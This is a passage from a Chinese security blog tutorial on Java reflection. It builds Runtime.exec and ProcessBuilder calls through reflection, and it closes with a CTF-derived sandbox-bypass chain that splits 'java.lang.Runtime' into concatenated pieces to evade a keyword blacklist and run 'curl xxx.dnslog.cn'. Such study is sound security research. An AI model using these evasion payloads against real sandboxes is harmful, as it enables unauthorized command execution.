class="operator">=</span> Class.forName(<span class="string">&quot;java.lang.Runtime&quot;</span>);</span><br><span class="line">        clazz.getMethod(<span class="string">&quot;exec&quot;</span>, String.class).invoke(clazz.newInstance(), <span class="string">&quot;id&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* 报错</span></span><br><span class="line"><span class="comment">Exception ... can not access a member of class java.lang.Runtime with modifiers &quot;private&quot;</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>原因是<code>java.lang.Runtime</code>这个类的构造方法是私有的，这里涉及到<a target="_blank" rel="noopener" href="https://www.runoob.com/design-pattern/singleton-pattern.html">单例模式</a>的设计思想（比如Web应用中的数据库链接，通常只需要链接一次。此时可以将数据库链接所使用的类的构造函数设为私有，这样<strong>只有在类初始化时才会执行一次构造函数</strong>，然后通过编写一个静态方法来获取这个数据库对象）<br>这里<code>Runtime</code>类也使用了单例模式，因此只能通过<code>Runtime.getRuntime()</code>来获取<code>Runtime</code>对象。所以需要修改为：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-n4wuejls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-n4wuejls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestNewInstance</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;java.lang.Runtime&quot;</span>);</span><br><span class="line">        clazz.getMethod(<span class="string">&quot;exec&quot;</span>, String.class).invoke(</span><br><span class="line">            clazz.getMethod(<span class="string">&quot;getRuntime&quot;</span>).invoke(clazz), </span><br><span class="line">            <span class="string">&quot;open /System/Applications/Calculator.app&quot;</span></span><br><span class="line">        );</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>


<h3 id="getMethod和invoke"><a href="#getMethod和invoke" class="headerlink" title="getMethod和invoke"></a>getMethod和invoke</h3><blockquote>
<p>上面的例子中用到了<code>getMethod()</code>和<code>invoke()</code>方法。正常执行方法是<code>[1].method([2], [3], [4]...)</code> ，在反射里就是<code>method.invoke([1], [2], [3], [4]...)</code></p>
</blockquote>
<p><code>getMethod()</code>，作用是通过反射获取Class对象的指定公有方法，调用<code>getMethod()</code>时需要根据获取的方法传递对应的<strong>参数类型列表</strong>。<br>例如需要调用<code>Runtime.exec()</code>方法，该方法有6个重载，以第一个为例：<code>exec(String command)</code>，那么就需要传递一个<code>String</code>类的类对象</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-i5wqbwls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-i5wqbwls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">getMethod(<span class="string">&quot;exec&quot;</span>, String.class)</span><br><span class="line">            </span><br></pre></td></tr></table></div></figure>
<p><code>invoke()</code>属于<code>Method</code>类，作用是对方法进行调用</p>
<ul>
<li>如果执行的是普通方法，那么第一个参数是类对象</li>
<li>如果执行的是静态方法，那么第一个参数是类</li>
</ul>
<p>所以前面的例子也可以修改为：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-wdc0ydls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-wdc0ydls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestNewInstance</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;java.lang.Runtime&quot;</span>);</span><br><span class="line">        </span><br><span class="line">        <span class="type">Method</span> <span class="variable">execMethod</span> <span class="operator">=</span> clazz.getMethod(<span class="string">&quot;exec&quot;</span>, String.class);</span><br><span class="line">        <span class="type">Method</span> <span class="variable">getRuntimeMethod</span> <span class="operator">=</span> clazz.getMethod(<span class="string">&quot;getRuntime&quot;</span>);    </span><br><span class="line">        <span class="type">Object</span> <span class="variable">runtime</span> <span class="operator">=</span> getRuntimeMethod.invoke(clazz);</span><br><span class="line">        </span><br><span class="line">        execMethod.invoke(runtime, <span class="string">&quot;open /System/Applications/Calculator.app&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>这里有2个问题：</p>
<ul>
<li>如果一个类没有无参构造方法，也没有类似单例模式里的静态方法，怎样通过反射实例化该类？</li>
<li>如果一个方法或构造方法是私有方法，是否能够通过反射执行？</li>
</ul>
<h2 id="Class-getConstructor"><a href="#Class-getConstructor" class="headerlink" title="Class.getConstructor"></a>Class.getConstructor</h2><blockquote>
<p>如果一个类没有无参构造方法，也没有单例模式里的静态方法，怎样通过反射实例化该类？</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://docs.oracle.com/javase/7/docs/api/java/lang/Class.html#getConstructor%28java.lang.Class...%29">Class.getConstructor()</a>，作用是获取构造函数对象，接收的参数是<strong>构造函数的参数类型列表</strong>。获取到构造函数后，使用<code>newInstance</code>来进行实例化<br>以另一种命令执行方式<code>ProcessBuilder</code>类为例，该类有两个构造函数：</p>
<ul>
<li><code>public ProcessBuilder(List&lt;String&gt; command)</code></li>
<li><code>public ProcessBuilder(String... command)</code></li>
</ul>
<h3 id="反射替代强制类型转换"><a href="#反射替代强制类型转换" class="headerlink" title="反射替代强制类型转换"></a>反射替代强制类型转换</h3><p>第一种构造函数，需要传入<code>List.class</code>类对象。先通过反射来获取其构造函数，再调用<code>start()</code>方法执行命令：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-dxlglmls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-dxlglmls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.List;</span><br><span class="line"><span class="keyword">import</span> java.util.Arrays;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestProcessBuilder</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;java.lang.ProcessBuilder&quot;</span>);</span><br><span class="line">        ((ProcessBuilder) clazz.getConstructor(List.class).newInstance(Arrays.asList(<span class="string">&quot;open&quot;</span>, <span class="string">&quot;/System/Applications/Calculator.app&quot;</span>))).start();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>这个Payload用到了强制类型转换，实际情况下利用漏洞的时候没有这种语法，所以需要利用反射来完成这一步。这里通过<code>getMethod(&quot;start&quot;)</code>获取到<code>start</code>方法，然后<code>invoke</code>执行，<code>invoke</code>的第一个参数就是<code>ProcessBuilder</code>类对象</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-7vks9els7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-7vks9els7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.List;</span><br><span class="line"><span class="keyword">import</span> java.util.Arrays;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestProcessBuilder</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;java.lang.ProcessBuilder&quot;</span>);</span><br><span class="line"></span><br><span class="line">        clazz.getMethod(<span class="string">&quot;start&quot;</span>).invoke(</span><br><span class="line">            clazz.getConstructor(List.class).newInstance(Arrays.asList(<span class="string">&quot;open&quot;</span>, <span class="string">&quot;/System/Applications/Calculator.app&quot;</span>))</span><br><span class="line">        );</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


<h3 id="可变长参数"><a href="#可变长参数" class="headerlink" title="可变长参数"></a>可变长参数</h3><p>第二种构造函数，传递的参数为<code>(String... command)</code>，即表示这是一个可变长参数。如果想要在反射中获取这种参数，将其看作数组即可：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-4f5y3yls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-4f5y3yls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;java.lang.ProcessBuilder&quot;</span>);</span><br><span class="line">clazz.getConstructor(String[].class);</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>在调用<code>newInstance</code>的时候，因为这个函数本身接收的是一个可变长参数，<code>ProcessBuilder</code>所接收的也是一个可变长参数，二者叠加为一个二维数组，所以整个Payload如下：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-yt898sls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-yt898sls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestProcessBuilder</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;java.lang.ProcessBuilder&quot;</span>);</span><br><span class="line">        ((ProcessBuilder) clazz.getConstructor(String[].class).newInstance(<span class="keyword">new</span> <span class="title class_">String</span>[][]&#123;&#123;<span class="string">&quot;open&quot;</span>, <span class="string">&quot;/System/Applications/Calculator.app&quot;</span>&#125;&#125;)).start();</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>同样地可以利用完全反射完成：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-1k53ubls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-1k53ubls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestProcessBuilder</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;java.lang.ProcessBuilder&quot;</span>);</span><br><span class="line">        clazz.getMethod(<span class="string">&quot;start&quot;</span>).invoke(</span><br><span class="line">            clazz.getConstructor(String[].class).newInstance(<span class="keyword">new</span> <span class="title class_">String</span>[][]&#123;&#123;<span class="string">&quot;open&quot;</span>, <span class="string">&quot;/System/Applications/Calculator.app&quot;</span>&#125;&#125;)</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


<h2 id="Class-getDeclared"><a href="#Class-getDeclared" class="headerlink" title="Class.getDeclared"></a>Class.getDeclared</h2><blockquote>
<p>如果一个方法或构造方法是私有方法，是否能够通过反射执行？</p>
</blockquote>
<p>这里涉及到<code>getDeclared</code>系列的方法：<a target="_blank" rel="noopener" href="https://docs.oracle.com/javase/7/docs/api/java/lang/Class.html#getDeclaredMethod%28java.lang.String,%20java.lang.Class...%29">getDeclaredMethod()</a>和<a target="_blank" rel="noopener" href="https://docs.oracle.com/javase/7/docs/api/java/lang/Class.html#getDeclaredConstructor%28java.lang.Class...%29">getDeclaredConstructor()</a>。它们和普通<code>getMethod()/getConstructor()</code>的用法类似，主要区别在于：</p>
<ul>
<li><code>getMethod()</code>系列方法获取的是当前类中所有公共方法，包括从父类继承的方法</li>
<li><code>getDeclaredMethod()</code>系列方法获取的是当前类中“声明”的方法，包括私有方法，但不包括从父类继承的方法</li>
</ul>
<h3 id="反射私有构造方法"><a href="#反射私有构造方法" class="headerlink" title="反射私有构造方法"></a>反射私有构造方法</h3><ul>
<li>以<code>java.lang.Runtime</code>类为例，前文说到这个类的构造方法是私有的。这里可以直接调用<code>getDeclaredConstructor()</code>来获取这个私有的构造方法来实例化对象，从而执行命令<ul>
<li>需要注意的是，获取私有方法后需要用<code>setAccessible()</code>修改其作用域，否则仍然不能调用。</li>
</ul>
</li>
</ul>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-y7m7i2ls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-y7m7i2ls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestDeclared</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;java.lang.Runtime&quot;</span>);</span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">cs</span> <span class="operator">=</span> clazz.getDeclaredConstructor();</span><br><span class="line">        cs.setAccessible(<span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">        clazz.getMethod(<span class="string">&quot;exec&quot;</span>, String.class).invoke(</span><br><span class="line">            cs.newInstance(), </span><br><span class="line">            <span class="string">&quot;open /System/Applications/Calculator.app&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


<h2 id="实例-沙盒绕过"><a href="#实例-沙盒绕过" class="headerlink" title="实例-沙盒绕过"></a>实例-沙盒绕过</h2><blockquote>
<p>在安全研究中，我们使⽤反射的⼀⼤⽬的，就是绕过某些沙盒。</p>
</blockquote>
<p>⽐如上下⽂中如果只有<code>Integer</code>类型的数字，如何获取到可以执⾏命令的<code>Runtime</code>类呢，伪代码：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-nt7xabls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-nt7xabls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span>getClass().forName(<span class="string">&quot;java.lang.Runtime&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<blockquote>
<p>Code-Breaking 2018中某道题的第三方Writup：<a target="_blank" rel="noopener" href="http://rui0.cn/archives/1015">http://rui0.cn/archives/1015</a></p>
</blockquote>
<p>在JAVA中可以通过下面代码来执行命令，但在题目中使用了黑名单</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-bxkfq0ls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-bxkfq0ls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Runtime.getRuntime().exec(<span class="string">&quot;curl xxx.dnslog.cn&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>使用反射来构造一条调用链，这样就可以在关键字处使用字符串拼接来达到绕过黑名单的效果</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-33gep9ls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-33gep9ls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">String.class.getClass().forName(<span class="string">&quot;java.l&quot;</span>+<span class="string">&quot;ang.Ru&quot;</span>+<span class="string">&quot;ntime&quot;</span>).getMethod(<span class="string">&quot;exec&quot;</span>,String.class).invoke(String.class.getClass().forName(<span class="string">&quot;java.l&quot;</span>+<span class="string">&quot;ang.Ru&quot;</span>+<span class="string">&quot;ntime&quot;</span>).getMethod(<span class="string">&quot;getRu&quot;</span>+<span class="string">&quot;ntime&quot;</span>).invoke(String.class.getClass().forName(<span class="string">&quot;java.l&quot;</span>+<span class="string">&quot;ang.Ru&quot;</span>+<span class="string">&quot;ntime&quot;</span>)), <span class="string">&quot;curl xxx.dnslog.cn);</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></div></figure>
<p>整理一下比较容易理解：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-c2e9zkls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-c2e9zkls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">String.class.getClass()            <span class="comment">// 获取 Class 对象</span></span><br><span class="line">.forName(<span class="string">&quot;java.lang.Runtime&quot;</span>)      <span class="comment">// 获取 Runtime 对象</span></span><br><span class="line">.getMethod(<span class="string">&quot;exec&quot;</span>, String.class)   <span class="comment">// 获取 exec 方法</span></span><br><span class="line">.invoke(                           <span class="comment">// 反射调用 exec 方法</span></span><br><span class="line">    String.class.getClass()        <span class="comment">// 同上,获取并调用 getRuntime 方法</span></span><br><span class="line">    .forName(<span class="string">&quot;java.lang.Runtime&quot;</span>)</span><br><span class="line">    .getMethod(<span class="string">&quot;getRuntime&quot;</span>)</span><br><span class="line">    .invoke(                       <span class="comment">// 同上,获取 Runtime 对象</span></span><br><span class="line">        String.class.getClass()</span><br><span class="line">    .forName(<span class="string">&quot;java.lang.Runtime&quot;</span>)</span><br><span class="line">    ), </span><br><span class="line">  <span class="string">&quot;curl xxx.dnslog.cn&quot;</span>             <span class="comment">// exec 方法参数</span></span><br><span class="line">);</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<ul>
<li>完整代码：</li>
</ul>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-ly7513ls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-ly7513ls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestChain</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="comment">// Runtime.getRuntime().exec(&quot;curl xxx.dnslog.cn&quot;)</span></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            String.class.getClass().forName(<span class="string">&quot;java.lang.Runtime&quot;</span>).getMethod(<span class="string">&quot;exec&quot;</span>, String.class).invoke(</span><br><span class="line">                String.class.getClass().forName(<span class="string">&quot;java.lang.Runtime&quot;</span>).getMethod(<span class="string">&quot;getRuntime&quot;</span>).invoke(</span><br><span class="line">                    String.class.getClass().forName(<span class="string">&quot;java.lang.Runtime&quot;</span>)</span><br><span class="line">                ), <span class="string">&quot;curl xxx.dnslog.cn&quot;</span></span><br><span class="line">            );</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<ul>
<li>参考文章：<ul>
<li><a target="_blank" rel="noopener" href="https://docs.oracle.com/javase/7/docs/api/java/lang/Class.html">java.lang.Class</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/phith0n/JavaThings">Java安全漫谈</a></li>
<li><a target="_blank" rel="noopener" href="https://forum.butian.net/share/1333">Java反序列化学习之反射</a></li>
<li><a target="_blank" rel="noopener" href="http://rui0.cn/archives/1015">Code-Breaking Puzzles — javacon WriteUp</a></li>
</ul>
</li>
</ul>

  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/lists/">Lists</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87"><span class="toc-number">1.</span> <span class="toc-text">Java安全漫谈-反射篇</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Class-forName"><span class="toc-number">1.1.</span> <span class="toc-text">Class.forName</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E6%95%B0initialize"><span class="toc-number">1.1.1.</span> <span class="toc-text">参数initialize</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AE%80%E5%8D%95%E5%88%A9%E7%94%A8"><span class="toc-number">1.1.2.</span> <span class="toc-text">简单利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%B1%BB%E5%AF%B9%E8%B1%A1%E7%9A%84%E5%85%B6%E5%AE%83%E5%87%BD%E6%95%B0"><span class="toc-number">1.1.3.</span> <span class="toc-text">获取类对象的其它函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E5%86%85%E9%83%A8%E7%B1%BB"><span class="toc-number">1.1.4.</span> <span class="toc-text">调用内部类</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Class-newInstance"><span class="toc-number">1.2.</span> <span class="toc-text">Class.newInstance</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A7%81%E6%9C%89%E7%9A%84%E7%B1%BB%E6%9E%84%E9%80%A0%E6%96%B9%E6%B3%95"><span class="toc-number">1.2.1.</span> <span class="toc-text">私有的类构造方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#getMethod%E5%92%8Cinvoke"><span class="toc-number">1.2.2.</span> <span class="toc-text">getMethod和invoke</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Class-getConstructor"><span class="toc-number">1.3.</span> <span class="toc-text">Class.getConstructor</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E6%9B%BF%E4%BB%A3%E5%BC%BA%E5%88%B6%E7%B1%BB%E5%9E%8B%E8%BD%AC%E6%8D%A2"><span class="toc-number">1.3.1.</span> <span class="toc-text">反射替代强制类型转换</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%AF%E5%8F%98%E9%95%BF%E5%8F%82%E6%95%B0"><span class="toc-number">1.3.2.</span> <span class="toc-text">可变长参数</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Class-getDeclared"><span class="toc-number">1.4.</span> <span class="toc-text">Class.getDeclared</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E7%A7%81%E6%9C%89%E6%9E%84%E9%80%A0%E6%96%B9%E6%B3%95"><span class="toc-number">1.4.1.</span> <span class="toc-text">反射私有构造方法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B-%E6%B2%99%E7%9B%92%E7%BB%95%E8%BF%87"><span class="toc-number">1.5.</span> <span class="toc-text">实例-沙盒绕过</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&text=Java安全漫谈-反射篇"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
